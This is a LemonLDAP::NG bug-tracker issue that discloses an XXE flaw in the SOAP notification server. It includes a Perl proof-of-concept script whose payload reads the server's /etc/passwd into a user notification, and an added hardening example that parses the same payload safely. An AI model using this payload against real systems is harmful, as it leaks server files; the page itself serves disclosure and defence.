LemonLDAP NG / lemonldap-ng / Issues / #1818

[Security:low] XXE vulnerability in SOAP notification server

Note: due to #1819 (closed), this security issue is not exploitable in versions 2.0.0 through 2.0.4, because the SOAP notification server does not work at all in those versions. That is why it is tagged "Security:low".

This vulnerability was found during a security by one of our users. I am merely a reporter this time, not the discoverer ;)

  • Activate the Notification server
  • Choose Old XML format
  • Run this script:

```perl
#!/usr/bin/perl

use SOAP::Lite;
use utf8;

my $lite = SOAP::Lite
        ->uri('urn:Lemonldap::NG::Common::PSGI::SOAPService')
        ->proxy('http://auth.example.com/notifications');

my $r = $lite->newNotification('<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<notification uid="dwho" date="2019-06-26" reference="ABCD">
<text>&xxe;</text>
<text> You have been granted to access to appli-1 </text>
<text> You have been granted to access to appli-2 </text>
<check> I know that I can access to appli-1 </check>
<check> I know that I can access to appli-2 </check>
</notification>
</root>
');

if ( $r->fault ) {
        print STDERR "SOAP Error: " . $r->fault->{faultstring};
}
else {
        my $res = $r->result();
        print "$res notification(s) have been inserted\n";
}
```

  • Login as dwho
  • Fix the templatesDir/templateDir typo in Notifications/XML.pm and login again ;)
  • Result:

[screenshot: the notification shown to dwho after login, containing the content of the server's /etc/passwd]

(of course this is the server-side /etc/passwd that gets displayed, not the client-side one)

The security impact on 2.0 is very low: the templatesDir/templateDir typo makes SOAP notifications unusable in 2.0 in its current state, REST is the default, notifications are not enabled by default, and access to the notification server should be filtered anyway.

However, users of old versions might be more exposed.
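The server-side counterpart to the report above, as an added example rather than LemonLDAP::NG's own code: an XML::LibXML parser for incoming notifications configured so that external entities are never loaded or expanded, combined with an outright rejection of any notification that carries a DOCTYPE (a stricter policy than the page describes, since notifications never need a DTD). The sample notification is constructed from the one in the report, and the `parse_notification` function name is an assumption of this example.

```perl
#!/usr/bin/perl
# Added example (not LemonLDAP::NG project code): parse an untrusted XML
# notification so that an entity such as the one in the report can never be
# resolved against the server's filesystem or network.
use strict;
use warnings;
use XML::LibXML;

# Constructed sample input, same shape as the notification in the report.
my $untrusted_xml = <<'XML';
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<notification uid="dwho" date="2019-06-26" reference="ABCD">
<text>&xxe;</text>
<text> You have been granted to access to appli-1 </text>
</notification>
</root>
XML

# Returns the parsed XML::LibXML::Document, or dies with the reason the
# notification was refused. Function name is this example's own.
sub parse_notification {
    my ($xml) = @_;

    # Hardened parser: never load external DTDs, never expand entities,
    # never touch the network, and keep libxml2's default size limits.
    my $parser = XML::LibXML->new(
        load_ext_dtd    => 0,
        expand_entities => 0,
        no_network      => 1,
        huge            => 0,
    );

    my $doc = eval { $parser->parse_string($xml) };
    die "Malformed notification: $@" if $@;

    # Defence in depth: a notification has no business carrying a DTD at
    # all, so refuse any internal or external subset regardless of the
    # parser flags above.
    if ( $doc->internalSubset or $doc->externalSubset ) {
        die "Rejected notification: DOCTYPE declarations are not allowed\n";
    }
    return $doc;
}

my $doc = eval { parse_notification($untrusted_xml) };
if ($@) {
    # The constructed sample ends up here: it is refused before storage.
    print STDERR $@;
}
else {
    # Accepted notifications: read only the attributes and text we expect.
    for my $n ( $doc->findnodes('/root/notification') ) {
        printf "uid=%s date=%s reference=%s\n",
            $n->getAttribute('uid'), $n->getAttribute('date'),
            $n->getAttribute('reference');
        print "  text: ", $_->textContent, "\n" for $n->findnodes('text');
    }
}
```

With `load_ext_dtd` and `expand_entities` off, libxml2 does not read the file named by the SYSTEM entity while parsing, and the DOCTYPE check turns such a request into a clean rejection before anything is stored or later rendered to the user. The same parser options apply to any XML::LibXML parser that handles input from a client.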

Edited Jun 26, 2019 by Yadd